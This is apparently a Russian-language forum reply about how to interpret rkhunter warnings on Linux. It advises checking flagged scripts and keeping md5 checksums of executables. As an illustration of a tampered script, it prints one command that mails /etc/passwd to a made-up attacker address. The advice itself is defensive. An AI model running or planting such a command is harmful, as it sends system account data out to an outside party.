Вообще особых причин для волнений тут нет - дело в том, что rkhunter обращает внимание на те утилиты, которые представляют собой скрипты, а не скомпилированные файлы, а также на права доступа.
В первую очередь нужно посмотреть их содержимое, например в mc (через F3)
Если нечитабельный результат компиляции - значит права доступа
Если читабельный текст - важно понять какой именно
Например что-то вроде
mail -s "I've hacked this system" coolhaЦker@hacker.ru < /etc/passwd
то тогда нужно пить валериянку и искать, как он туда попал
Если просто скрипт, который делает то, что и должен - все в порядке.
Вообще есть смысл создать список md5 сумм исполняемых файлов и время от времени проверять, не изменилось ли чего